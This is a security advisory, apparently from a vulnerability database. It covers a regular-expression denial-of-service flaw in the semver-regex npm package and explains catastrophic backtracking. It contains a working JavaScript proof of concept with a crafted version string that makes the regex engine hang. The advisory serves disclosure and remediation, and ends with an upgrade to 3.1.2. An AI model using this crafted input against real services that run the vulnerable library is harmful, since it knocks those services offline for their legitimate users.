  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a Regular expression for matching semver versions

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS).

PoC


// import of the vulnerable library
const semverRegex = require('semver-regex');
// import of measurement tools
const { PerformanceObserver, performance } = require('perf_hooks');

// config of measurements tools
const obs = new PerformanceObserver((items) => {
 console.log(items.getEntries()[0].duration);
 performance.clearMarks();
});
obs.observe({ entryTypes: ['measure'] });

// base version string
let version = "v1.1.3-0a"

// Adding the evil code, resulting in string
// v1.1.3-0aa.aa.aa.aa.aa.aa.a…a.a"
for(let i=0; i < 20; i++) {
   version += "a.a"
}

// produce a good version
// Parses well for the regex in milliseconds
let goodVersion = version + "2"

// good version proof
performance.mark("good before")
const goodresult = semverRegex().test(goodVersion);
performance.mark("good after")


console.log(`Good result: ${goodresult}`)
performance.measure('Good', 'good before', 'good after');

// create a bad/exploit version that is invalid due to the last $ sign
// will cause the nodejs engine to hang, if not, increase the a.a
// additions above a bit.
badVersion = version + "aaaaaaa$"

// exploit proof
performance.mark("bad before")
const badresult = semverRegex().test(badVersion);
performance.mark("bad after")

console.log(`Bad result: ${badresult}`)
performance.measure('Bad', 'bad before', 'bad after');

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.2 or higher.

References